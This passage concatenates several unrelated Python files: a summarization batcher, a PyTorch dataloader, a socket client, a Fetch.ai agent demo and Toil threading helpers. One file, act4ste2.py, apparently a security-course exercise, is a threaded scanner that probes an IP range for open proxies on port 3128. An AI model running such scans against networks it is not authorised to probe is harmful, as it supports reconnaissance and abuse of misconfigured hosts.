article_words = article_words[:config.max_enc_steps]
self.enc_len = len(article_words) # store the length after truncation but before padding
self.enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token
# Process the abstract
abstract = ' '.join(abstract_sentences) # string
abstract_words = abstract.split() # list of strings
abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token
# Get the decoder input sequence and target sequence
self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, config.max_dec_steps, start_decoding, stop_decoding)
self.dec_len = len(self.dec_input)
# If using pointer-generator mode, we need to store some extra info
if config.pointer_gen:
# Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
# Get a verison of the reference summary where in-article OOVs are represented by their temporary article OOV id
abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
# Overwrite decoder target sequence so it uses the temp article OOV ids
_, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, config.max_dec_steps, start_decoding, stop_decoding)
# Store the original strings
self.original_article = article
self.original_abstract = abstract
self.original_abstract_sents = abstract_sentences
def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
inp = [start_id] + sequence[:]
target = sequence[:]
if len(inp) > max_len: # truncate
inp = inp[:max_len]
target = target[:max_len] # no end_token
else: # no truncation
target.append(stop_id) # end token
assert len(inp) == len(target)
return inp, target
def pad_decoder_inp_targ(self, max_len, pad_id):
while len(self.dec_input) < max_len:
self.dec_input.append(pad_id)
while len(self.target) < max_len:
self.target.append(pad_id)
def pad_encoder_input(self, max_len, pad_id):
while len(self.enc_input) < max_len:
self.enc_input.append(pad_id)
if config.pointer_gen:
while len(self.enc_input_extend_vocab) < max_len:
self.enc_input_extend_vocab.append(pad_id)
class Batch(object):
def __init__(self, example_list, vocab, batch_size):
self.batch_size = batch_size
self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences
self.init_encoder_seq(example_list) # initialize the input to the encoder
self.init_decoder_seq(example_list) # initialize the input and targets for the decoder
self.store_orig_strings(example_list) # store the original strings
def init_encoder_seq(self, example_list):
# Determine the maximum length of the encoder input sequence in this batch
max_enc_seq_len = max([ex.enc_len for ex in example_list])
# Pad the encoder input sequences up to the length of the longest sequence
for ex in example_list:
ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
# Initialize the numpy arrays
# Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
self.enc_batch = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.int32)
self.enc_lens = np.zeros((self.batch_size), dtype=np.int32)
self.enc_padding_mask = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.enc_batch[i, :] = ex.enc_input[:]
self.enc_lens[i] = ex.enc_len
for j in range(ex.enc_len):
self.enc_padding_mask[i][j] = 1
# For pointer-generator mode, need to store some extra info
if config.pointer_gen:
# Determine the max number of in-article OOVs in this batch
self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
# Store the in-article OOVs themselves
self.art_oovs = [ex.article_oovs for ex in example_list]
# Store the version of the enc_batch that uses the article OOV ids
self.enc_batch_extend_vocab = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.int32)
for i, ex in enumerate(example_list):
self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]
def init_decoder_seq(self, example_list):
# Pad the inputs and targets
for ex in example_list:
ex.pad_decoder_inp_targ(config.max_dec_steps, self.pad_id)
# Initialize the numpy arrays.
self.dec_batch = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.int32)
self.target_batch = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.int32)
self.dec_padding_mask = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.float32)
self.dec_lens = np.zeros((self.batch_size), dtype=np.int32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.dec_batch[i, :] = ex.dec_input[:]
self.target_batch[i, :] = ex.target[:]
self.dec_lens[i] = ex.dec_len
for j in range(ex.dec_len):
self.dec_padding_mask[i][j] = 1
def store_orig_strings(self, example_list):
self.original_articles = [ex.original_article for ex in example_list] # list of lists
self.original_abstracts = [ex.original_abstract for ex in example_list] # list of lists
self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list] # list of list of lists
class Batcher(object):
BATCH_QUEUE_MAX = 100 # max number of batches the batch_queue can hold
def __init__(self, data_path, vocab, mode, batch_size, single_pass):
self._data_path = data_path
self._vocab = vocab
self._single_pass = single_pass
self.mode = mode
self.batch_size = batch_size
# Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
self._batch_queue = Queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = Queue.Queue(self.BATCH_QUEUE_MAX * self.batch_size)
# Different settings depending on whether we're in single_pass mode or not
if single_pass:
self._num_example_q_threads = 1 # just one thread, so we read through the dataset just once
self._num_batch_q_threads = 1 # just one thread to batch examples
self._bucketing_cache_size = 1 # only load one batch's worth of examples before bucketing; this essentially means no bucketing
self._finished_reading = False # this will tell us when we're finished reading the dataset
else:
self._num_example_q_threads = 1 #16 # num threads to fill example queue
self._num_batch_q_threads = 1 #4 # num threads to fill batch queue
self._bucketing_cache_size = 1 #100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in range(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in range(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
if not single_pass: # We don't want a watcher in single_pass mode because the threads shouldn't run forever
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
if self._single_pass and self._finished_reading:
tf.logging.info("Finished reading dataset in single_pass mode.")
return None
batch = self._batch_queue.get() # get the next Batch
return batch
def fill_example_queue(self):
input_gen = self.text_generator(data.example_generator(self._data_path, self._single_pass))
while True:
try:
(article, abstract) = next(input_gen) # read the next example from file. article and abstract are both strings.
except StopIteration: # if there are no more examples:
tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
if self._single_pass:
tf.logging.info("single_pass mode is on, so we've finished reading dataset. This thread is stopping.")
self._finished_reading = True
break
else:
raise Exception("single_pass mode is off but the example generator is out of data; error.")
abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)] # Use the <s> and </s> tags in abstract to get a list of sentences.
example = Example(article, abstract_sentences, self._vocab) # Process into an Example.
self._example_queue.put(example) # place the Example in the example queue.
def fill_batch_queue(self):
while True:
if self.mode == 'decode':
# beam search decode mode single example repeated in the batch
ex = self._example_queue.get()
b = [ex for _ in range(self.batch_size)]
self._batch_queue.put(Batch(b, self._vocab, self.batch_size))
else:
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in range(self.batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
inputs = sorted(inputs, key=lambda inp: inp.enc_len, reverse=True) # sort by length of encoder sequence
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in range(0, len(inputs), self.batch_size):
batches.append(inputs[i:i + self.batch_size])
if not self._single_pass:
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._vocab, self.batch_size))
def watch_threads(self):
while True:
tf.logging.info(
'Bucket queue size: %i, Input queue size: %i',
self._batch_queue.qsize(), self._example_queue.qsize())
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def text_generator(self, example_generator):
while True:
e = next(example_generator) # e is a tf.Example
try:
article_text = e.features.feature['article'].bytes_list.value[0] # the article text was saved under the key 'article' in the data files
abstract_text = e.features.feature['abstract'].bytes_list.value[0] # the abstract text was saved under the key 'abstract' in the data files
except ValueError:
tf.logging.error('Failed to get article or abstract from example')
continue
if len(article_text)==0: # See https://github.com/abisee/pointer-generator/issues/1
#tf.logging.warning('Found an example with empty article text. Skipping it.')
continue
else:
yield (article_text, abstract_text)
|
act4ste2.py |
#Name: Quy Nguyen
#python3
import sys
import requests
import ipaddress
import threading
openProxyList = []
threads = []
ipList = []
#check an ip for open proxy
#https :1080
#ftp :3128
def checkOpenProxy(ip):
try:
req = requests.get("http://csec.rit.edu",timeout = 1, proxies={"http":"http://"+str(ip)+":3128"})
openProxyList.append(str(ip))
except:
pass
#get a list of IPs between startIP and endIP
def getIPList(startIP, endIP):
ipList = []
while startIP <= endIP:
ipList.append(startIP)
startIP = startIP+1
return ipList
#https://docs.python.org/2/library/threading.html
if __name__=="__main__":
if len(sys.argv) != 3:
print("Please input a start IP and an end IP address:")
sys.exit()
else:
#Getting IP addresses
startIP = ipaddress.ip_address(sys.argv[1])
endIP = ipaddress.ip_address(sys.argv[2])
ipList = getIPList(startIP, endIP)
#Starting threads to check proxy for each ip
for ip in ipList:
thr = threading.Thread(target=checkOpenProxy, args=(ip,))
threads.append(thr)
thr.start()
#Save guarding the result - dont let the system messup the array
for thr in threads:
thr.join()
#Printing Results
print("IPs that have open proxy:")
for ip in openProxyList:
print(ip)
|
client.py | #!/usr/bin/env python3
import socket
import struct
import threading
SERVER_SOCKET_PATH = "./socket"
FMT = "!L"
def read_number_from_socket(connection):
return struct.unpack(FMT, connection.recv(4))[0]
def write_number_to_socket(connection, number):
connection.send(struct.pack(FMT, number))
def client(t_id):
sock = socket.socket(socket.AF_UNIX)
sock.connect(SERVER_SOCKET_PATH)
with open('./input.txt', 'r') as fp:
commands = fp.read()
for command in commands.splitlines():
for opt in command.split():
sock.send(struct.pack(FMT, int(opt)))
value_cnt = read_number_from_socket(sock)
print(value_cnt)
for _ in range(value_cnt):
value = read_number_from_socket(sock)
#print('tid', t_id, value)
print(value)
sock.close()
print('termnated', t_id)
def main():
for t_id in range(1):
t = threading.Thread(target=client, args=(t_id,))
t.start()
if __name__ == "__main__":
main()
|
dataloader.py | import random
import torch
import torch.multiprocessing as multiprocessing
from torch._C import _set_worker_signal_handlers, \
_remove_worker_pids, _error_if_any_worker_fails
from packaging import version
if version.Version(torch.__version__) >= version.Version('1.0.0'):
from torch._C import _set_worker_pids
else:
from torch._C import _update_worker_pids as _set_worker_pids
from torch.utils.data import SequentialSampler, RandomSampler, BatchSampler
import signal
import functools
import collections
import re
import sys
import threading
import traceback
import os
import time
from torch._six import string_classes, int_classes, FileNotFoundError
IS_WINDOWS = sys.platform == "win32"
if IS_WINDOWS:
import ctypes
from ctypes.wintypes import DWORD, BOOL, HANDLE
if sys.version_info[0] == 2:
import Queue as queue
else:
import queue
class ExceptionWrapper(object):
r"""Wraps an exception plus traceback to communicate across threads"""
def __init__(self, exc_info):
self.exc_type = exc_info[0]
self.exc_msg = "".join(traceback.format_exception(*exc_info))
_use_shared_memory = False
r"""Whether to use shared memory in default_collate"""
MANAGER_STATUS_CHECK_INTERVAL = 5.0
if IS_WINDOWS:
# On Windows, the parent ID of the worker process remains unchanged when the manager process
# is gone, and the only way to check it through OS is to let the worker have a process handle
# of the manager and ask if the process status has changed.
class ManagerWatchdog(object):
def __init__(self):
self.manager_pid = os.getppid()
self.kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
self.kernel32.OpenProcess.argtypes = (DWORD, BOOL, DWORD)
self.kernel32.OpenProcess.restype = HANDLE
self.kernel32.WaitForSingleObject.argtypes = (HANDLE, DWORD)
self.kernel32.WaitForSingleObject.restype = DWORD
# Value obtained from https://msdn.microsoft.com/en-us/library/ms684880.aspx
SYNCHRONIZE = 0x00100000
self.manager_handle = self.kernel32.OpenProcess(SYNCHRONIZE, 0, self.manager_pid)
if not self.manager_handle:
raise ctypes.WinError(ctypes.get_last_error())
def is_alive(self):
# Value obtained from https://msdn.microsoft.com/en-us/library/windows/desktop/ms687032.aspx
return self.kernel32.WaitForSingleObject(self.manager_handle, 0) != 0
else:
class ManagerWatchdog(object):
def __init__(self):
self.manager_pid = os.getppid()
def is_alive(self):
return os.getppid() == self.manager_pid
def _worker_loop(dataset, index_queue, data_queue, collate_fn, init_fn, worker_id):
global _use_shared_memory
_use_shared_memory = True
# Intialize C side signal handlers for SIGBUS and SIGSEGV. Python signal
# module's handlers are executed after Python returns from C low-level
# handlers, likely when the same fatal signal happened again already.
# https://docs.python.org/3/library/signal.html Sec. 18.8.1.1
_set_worker_signal_handlers()
torch.set_num_threads(1)
if init_fn is not None:
init_fn(worker_id)
watchdog = ManagerWatchdog()
while True:
try:
r = index_queue.get(timeout=MANAGER_STATUS_CHECK_INTERVAL)
except queue.Empty:
if watchdog.is_alive():
continue
else:
break
if r is None:
break
idx, batch_indices = r
try:
samples = collate_fn([dataset[i] for i in batch_indices])
except Exception:
data_queue.put((idx, ExceptionWrapper(sys.exc_info())))
else:
data_queue.put((idx, samples))
del samples
def _worker_manager_loop(in_queue, out_queue, done_event, pin_memory, device_id):
if pin_memory:
torch.cuda.set_device(device_id)
while True:
try:
r = in_queue.get()
except Exception:
if done_event.is_set():
return
raise
if r is None:
break
if isinstance(r[1], ExceptionWrapper):
out_queue.put(r)
continue
idx, batch = r
try:
if pin_memory:
batch = pin_memory_batch(batch)
except Exception:
out_queue.put((idx, ExceptionWrapper(sys.exc_info())))
else:
out_queue.put((idx, batch))
numpy_type_map = {
'float64': torch.DoubleTensor,
'float32': torch.FloatTensor,
'float16': torch.HalfTensor,
'int64': torch.LongTensor,
'int32': torch.IntTensor,
'int16': torch.ShortTensor,
'int8': torch.CharTensor,
'uint8': torch.ByteTensor,
}
def default_collate(batch):
r"""Puts each data field into a tensor with outer dimension batch size"""
error_msg = "batch must contain tensors, numbers, dicts or lists; found {}"
elem_type = type(batch[0])
if isinstance(batch[0], torch.Tensor):
out = None
if _use_shared_memory:
# If we're in a background process, concatenate directly into a
# shared memory tensor to avoid an extra copy
numel = sum([x.numel() for x in batch])
storage = batch[0].storage()._new_shared(numel)
out = batch[0].new(storage)
return torch.stack(batch, 0, out=out)
elif elem_type.__module__ == 'numpy' and elem_type.__name__ != 'str_' \
and elem_type.__name__ != 'string_':
elem = batch[0]
if elem_type.__name__ == 'ndarray':
# array of string classes and object
if re.search('[SaUO]', elem.dtype.str) is not None:
raise TypeError(error_msg.format(elem.dtype))
return torch.stack([torch.from_numpy(b) for b in batch], 0)
if elem.shape == (): # scalars
py_type = float if elem.dtype.name.startswith('float') else int
return numpy_type_map[elem.dtype.name](list(map(py_type, batch)))
elif isinstance(batch[0], int_classes):
return torch.LongTensor(batch)
elif isinstance(batch[0], float):
return torch.DoubleTensor(batch)
elif isinstance(batch[0], string_classes):
return batch
elif isinstance(batch[0], collections.Mapping):
return {key: default_collate([d[key] for d in batch]) for key in batch[0]}
elif isinstance(batch[0], collections.Sequence):
transposed = zip(*batch)
return [default_collate(samples) for samples in transposed]
raise TypeError((error_msg.format(type(batch[0]))))
def pin_memory_batch(batch):
if isinstance(batch, torch.Tensor):
return batch.pin_memory()
elif isinstance(batch, string_classes):
return batch
elif isinstance(batch, collections.Mapping):
return {k: pin_memory_batch(sample) for k, sample in batch.items()}
elif isinstance(batch, collections.Sequence):
return [pin_memory_batch(sample) for sample in batch]
else:
return batch
_SIGCHLD_handler_set = False
r"""Whether SIGCHLD handler is set for DataLoader worker failures. Only one
handler needs to be set for all DataLoaders in a process."""
def _set_SIGCHLD_handler():
# Windows doesn't support SIGCHLD handler
if sys.platform == 'win32':
return
# can't set signal in child threads
if not isinstance(threading.current_thread(), threading._MainThread):
return
global _SIGCHLD_handler_set
if _SIGCHLD_handler_set:
return
previous_handler = signal.getsignal(signal.SIGCHLD)
if not callable(previous_handler):
previous_handler = None
def handler(signum, frame):
# This following call uses `waitid` with WNOHANG from C side. Therefore,
# Python can still get and update the process status successfully.
_error_if_any_worker_fails()
if previous_handler is not None:
previous_handler(signum, frame)
signal.signal(signal.SIGCHLD, handler)
_SIGCHLD_handler_set = True
class _SequentialDataLoaderIter(object):
r"""Iterates once over the DataLoader's dataset, as specified by the sampler"""
def __init__(self, loader):
self.dataset = loader.dataset
self.collate_fn = loader.collate_fn
self.batch_sampler = loader.batch_sampler
self.num_workers = loader.num_workers
self.pin_memory = loader.pin_memory and torch.cuda.is_available()
self.timeout = loader.timeout
self.done_event = threading.Event()
self.sample_iter = iter(self.batch_sampler)
if self.num_workers > 0:
self.worker_init_fn = loader.worker_init_fn
self.index_queues = [multiprocessing.Queue() for _ in range(self.num_workers)]
self.worker_queue_idx = 0
self.worker_result_queue = multiprocessing.SimpleQueue()
self.batches_outstanding = 0
self.worker_pids_set = False
self.shutdown = False
self.send_idx = 0
self.rcvd_idx = 0
self.reorder_dict = {}
self.workers = [
multiprocessing.Process(
target=_worker_loop,
args=(self.dataset, self.index_queues[i],
self.worker_result_queue, self.collate_fn, self.worker_init_fn, i))
for i in range(self.num_workers)]
if self.pin_memory or self.timeout > 0:
self.data_queue = queue.Queue()
if self.pin_memory:
maybe_device_id = torch.cuda.current_device()
else:
# do not initialize cuda context if not necessary
maybe_device_id = None
self.worker_manager_thread = threading.Thread(
target=_worker_manager_loop,
args=(self.worker_result_queue, self.data_queue, self.done_event, self.pin_memory,
maybe_device_id))
self.worker_manager_thread.daemon = True
self.worker_manager_thread.start()
else:
self.data_queue = self.worker_result_queue
for w in self.workers:
w.daemon = True # ensure that the worker exits on process exit
w.start()
_set_worker_pids(id(self), tuple(w.pid for w in self.workers))
_set_SIGCHLD_handler()
self.worker_pids_set = True
# prime the prefetch loop
for _ in range(2 * self.num_workers):
self._put_indices()
def __len__(self):
return len(self.batch_sampler)
def _get_batch(self):
if self.timeout > 0:
try:
return self.data_queue.get(timeout=self.timeout)
except queue.Empty:
raise RuntimeError('DataLoader timed out after {} seconds'.format(self.timeout))
else:
return self.data_queue.get()
def __next__(self):
if self.num_workers == 0: # same-process loading
indices = next(self.sample_iter) # may raise StopIteration
batch = self.collate_fn([self.dataset[i] for i in indices])
if self.pin_memory:
batch = pin_memory_batch(batch)
return batch
# check if the next sample has already been generated
if self.rcvd_idx in self.reorder_dict:
batch = self.reorder_dict.pop(self.rcvd_idx)
return self._process_next_batch(batch)
if self.batches_outstanding == 0:
self._shutdown_workers()
raise StopIteration
while True:
assert (not self.shutdown and self.batches_outstanding > 0)
idx, batch = self._get_batch()
self.batches_outstanding -= 1
if idx != self.rcvd_idx:
# store out-of-order samples
self.reorder_dict[idx] = batch
continue
return self._process_next_batch(batch)
next = __next__ # Python 2 compatibility
def __iter__(self):
return self
def _put_indices(self):
assert self.batches_outstanding < 2 * self.num_workers
indices = next(self.sample_iter, None)
if indices is None:
return
self.index_queues[self.worker_queue_idx].put((self.send_idx, indices))
self.worker_queue_idx = (self.worker_queue_idx + 1) % self.num_workers
self.batches_outstanding += 1
self.send_idx += 1
def _process_next_batch(self, batch):
self.rcvd_idx += 1
self._put_indices()
if isinstance(batch, ExceptionWrapper):
raise batch.exc_type(batch.exc_msg)
return batch
def __getstate__(self):
# TODO: add limited pickling support for sharing an iterator
# across multiple threads for HOGWILD.
# Probably the best way to do this is by moving the sample pushing
# to a separate thread and then just sharing the data queue
# but signalling the end is tricky without a non-blocking API
raise NotImplementedError("_SequentialDataLoaderIter cannot be pickled")
def _shutdown_workers(self):
try:
if not self.shutdown:
self.shutdown = True
self.done_event.set()
for q in self.index_queues:
q.put(None)
# if some workers are waiting to put, make place for them
try:
while not self.worker_result_queue.empty():
self.worker_result_queue.get()
except (FileNotFoundError, ImportError):
# Many weird errors can happen here due to Python
# shutting down. These are more like obscure Python bugs.
# FileNotFoundError can happen when we rebuild the fd
# fetched from the queue but the socket is already closed
# from the worker side.
# ImportError can happen when the unpickler loads the
# resource from `get`.
pass
# done_event should be sufficient to exit worker_manager_thread,
# but be safe here and put another None
self.worker_result_queue.put(None)
finally:
# removes pids no matter what
if self.worker_pids_set:
_remove_worker_pids(id(self))
self.worker_pids_set = False
def __del__(self):
if self.num_workers > 0:
self._shutdown_workers()
class SequentialDataLoader(object):
r"""
Sequential Data loader. Combines a dataset and a sampler, and provides
single- or multi-process iterators over the dataset.
This is modified from Pytorch.DataLoader by disable random state touch as for sequential data loading,
we don't want it to touch any random state.
Arguments:
dataset (Dataset): dataset from which to load the data.
batch_size (int, optional): how many samples per batch to load
(default: 1).
shuffle (bool, optional): set to ``True`` to have the data reshuffled
at every epoch (default: False).
sampler (Sampler, optional): defines the strategy to draw samples from
the dataset. If specified, ``shuffle`` must be False.
batch_sampler (Sampler, optional): like sampler, but returns a batch of
indices at a time. Mutually exclusive with batch_size, shuffle,
sampler, and drop_last.
num_workers (int, optional): how many subprocesses to use for data
loading. 0 means that the data will be loaded in the main process.
(default: 0)
collate_fn (callable, optional): merges a list of samples to form a mini-batch.
pin_memory (bool, optional): If ``True``, the data loader will copy tensors
into CUDA pinned memory before returning them.
drop_last (bool, optional): set to ``True`` to drop the last incomplete batch,
if the dataset size is not divisible by the batch size. If ``False`` and
the size of dataset is not divisible by the batch size, then the last batch
will be smaller. (default: False)
timeout (numeric, optional): if positive, the timeout value for collecting a batch
from workers. Should always be non-negative. (default: 0)
worker_init_fn (callable, optional): If not None, this will be called on each
worker subprocess with the worker id (an int in ``[0, num_workers - 1]``) as
input, after seeding and before data loading. (default: None)
.. note:: By default, each worker will have its PyTorch seed set to
``base_seed + worker_id``, where ``base_seed`` is a long generated
by main process using its RNG. However, seeds for other libraies
may be duplicated upon initializing workers (w.g., NumPy), causing
each worker to return identical random numbers. (See
:ref:`dataloader-workers-random-seed` section in FAQ.) You may
use ``torch.initial_seed()`` to access the PyTorch seed for each
worker in :attr:`worker_init_fn`, and use it to set other seeds
before data loading.
.. warning:: If ``spawn`` start method is used, :attr:`worker_init_fn` cannot be an
unpicklable object, e.g., a lambda function.
"""
__initialized = False
def __init__(self, dataset, batch_size=1, shuffle=False, sampler=None, batch_sampler=None,
num_workers=0, collate_fn=default_collate, pin_memory=False, drop_last=False,
timeout=0, worker_init_fn=None):
self.dataset = dataset
self.batch_size = batch_size
self.num_workers = num_workers
self.collate_fn = collate_fn
self.pin_memory = pin_memory
self.drop_last = drop_last
self.timeout = timeout
self.worker_init_fn = worker_init_fn
if timeout < 0:
raise ValueError('timeout option should be non-negative')
if batch_sampler is not None:
if batch_size > 1 or shuffle or sampler is not None or drop_last:
raise ValueError('batch_sampler option is mutually exclusive '
'with batch_size, shuffle, sampler, and '
'drop_last')
self.batch_size = None
self.drop_last = None
if sampler is not None and shuffle:
raise ValueError('sampler option is mutually exclusive with '
'shuffle')
if self.num_workers < 0:
raise ValueError('num_workers option cannot be negative; '
'use num_workers=0 to disable multiprocessing.')
if batch_sampler is None:
if sampler is None:
if shuffle:
sampler = RandomSampler(dataset)
else:
sampler = SequentialSampler(dataset)
batch_sampler = BatchSampler(sampler, batch_size, drop_last)
self.sampler = sampler
self.batch_sampler = batch_sampler
self.__initialized = True
def __setattr__(self, attr, val):
if self.__initialized and attr in ('batch_size', 'sampler', 'drop_last'):
raise ValueError('{} attribute should not be set after {} is '
'initialized'.format(attr, self.__class__.__name__))
super(SequentialDataLoader, self).__setattr__(attr, val)
def __iter__(self):
return _SequentialDataLoaderIter(self)
def __len__(self):
return len(self.batch_sampler)
from queue import Queue,Empty
from threading import Thread
class AsyncDataLoader(object):
def __init__(self, dataloader, buffer_size=100):
self.buffer_size = buffer_size
self.dataloader = dataloader
def __iter__(self):
queue = Queue(self.buffer_size)
dl=iter(self.dataloader)
def _worker():
while True:
try:
queue.put(next(dl))
except StopIteration:
break
queue.put(None)
t=Thread(target=_worker)
t.start()
while True:
d = queue.get()
if d is None:
break
yield d
del t
del queue
def __len__(self):
return len(self.dataloader)
|
agent_code_block.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This scripts contains code from agent-vs-aea.md file."""
import os
import time
from threading import Thread
from typing import List
from aea.agent import Agent
from aea.configurations.base import ConnectionConfig
from aea.connections.base import Connection
from aea.helpers.file_io import write_with_lock
from aea.identity.base import Identity
from aea.mail.base import Envelope
from packages.fetchai.connections.stub.connection import StubConnection
from packages.fetchai.protocols.default.message import DefaultMessage
INPUT_FILE = "input_file"
OUTPUT_FILE = "output_file"
class MyAgent(Agent):
"""A simple agent."""
def __init__(self, identity: Identity, connections: List[Connection]):
"""Initialise the agent."""
super().__init__(identity, connections)
def setup(self):
"""Setup the agent."""
def act(self):
"""Act implementation."""
print("Act called for tick {}".format(self.tick))
def handle_envelope(self, envelope: Envelope) -> None:
"""
Handle envelope.
:param envelope: the envelope received
:return: None
"""
print("React called for tick {}".format(self.tick))
if (
envelope is not None
and envelope.protocol_specification_id
== DefaultMessage.protocol_specification_id
):
sender = envelope.sender
receiver = envelope.to
envelope.to = sender
envelope.sender = receiver
envelope.message = DefaultMessage.serializer.decode(envelope.message_bytes)
envelope.message.sender = receiver
envelope.message.to = sender
print(
"Received envelope from {} with protocol_specification_id={}".format(
sender, envelope.protocol_specification_id
)
)
self.outbox.put(envelope)
def teardown(self):
"""Teardown the agent."""
def run():
"""Run demo."""
# Ensure the input and output files do not exist initially
if os.path.isfile(INPUT_FILE):
os.remove(INPUT_FILE)
if os.path.isfile(OUTPUT_FILE):
os.remove(OUTPUT_FILE)
# Create an addresses identity:
identity = Identity(
name="my_agent", address="some_address", public_key="public_key"
)
# Set up the stub connection
configuration = ConnectionConfig(
input_file_path=INPUT_FILE,
output_file_path=OUTPUT_FILE,
connection_id=StubConnection.connection_id,
)
stub_connection = StubConnection(
configuration=configuration, data_dir=".", identity=identity
)
# Create our Agent
my_agent = MyAgent(identity, [stub_connection])
# Set the agent running in a different thread
try:
t = Thread(target=my_agent.start)
t.start()
# Wait for everything to start up
time.sleep(3)
# Create a message inside an envelope and get the stub connection to pass it into the agent
message_text = b"my_agent,other_agent,fetchai/default:1.0.0,\x12\r\x08\x01*\t*\x07\n\x05hello,"
with open(INPUT_FILE, "wb") as f:
write_with_lock(f, message_text)
# Wait for the envelope to get processed
time.sleep(2)
# Read the output envelope generated by the agent
with open(OUTPUT_FILE, "rb") as f:
print("output message: " + f.readline().decode("utf-8"))
finally:
# Shut down the agent
my_agent.stop()
t.join()
if __name__ == "__main__":
run()
|
threading.py | # Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# 5.14.2018: copied into Toil from https://github.com/BD2KGenomics/bd2k-python-lib
from __future__ import absolute_import
from future.utils import raise_
from builtins import range
import atexit
import fcntl
import logging
import math
import os
import sys
import tempfile
import threading
import traceback
from contextlib import contextmanager
from threading import BoundedSemaphore
import psutil
from toil.lib.misc import robust_rmtree
log = logging.getLogger(__name__)
class BoundedEmptySemaphore( BoundedSemaphore ):
"""
A bounded semaphore that is initially empty.
"""
def __init__( self, value=1, verbose=None ):
super( BoundedEmptySemaphore, self ).__init__( value, verbose )
for i in range( value ):
# Empty out the semaphore
assert self.acquire( blocking=False )
class ExceptionalThread(threading.Thread):
"""
A thread whose join() method re-raises exceptions raised during run(). While join() is
idempotent, the exception is only during the first invocation of join() that successfully
joined the thread. If join() times out, no exception will be re reraised even though an
exception might already have occured in run().
When subclassing this thread, override tryRun() instead of run().
>>> def f():
... assert 0
>>> t = ExceptionalThread(target=f)
>>> t.start()
>>> t.join()
Traceback (most recent call last):
...
AssertionError
>>> class MyThread(ExceptionalThread):
... def tryRun( self ):
... assert 0
>>> t = MyThread()
>>> t.start()
>>> t.join()
Traceback (most recent call last):
...
AssertionError
"""
exc_info = None
def run( self ):
try:
self.tryRun( )
except:
self.exc_info = sys.exc_info( )
raise
def tryRun( self ):
super( ExceptionalThread, self ).run( )
def join( self, *args, **kwargs ):
super( ExceptionalThread, self ).join( *args, **kwargs )
if not self.is_alive( ) and self.exc_info is not None:
type, value, traceback = self.exc_info
self.exc_info = None
raise_(type, value, traceback)
# noinspection PyPep8Naming
class defaultlocal(threading.local):
"""
Thread local storage with default values for each field in each thread
>>>
>>> l = defaultlocal( foo=42 )
>>> def f(): print(l.foo)
>>> t = threading.Thread(target=f)
>>> t.start() ; t.join()
42
"""
def __init__( self, **kwargs ):
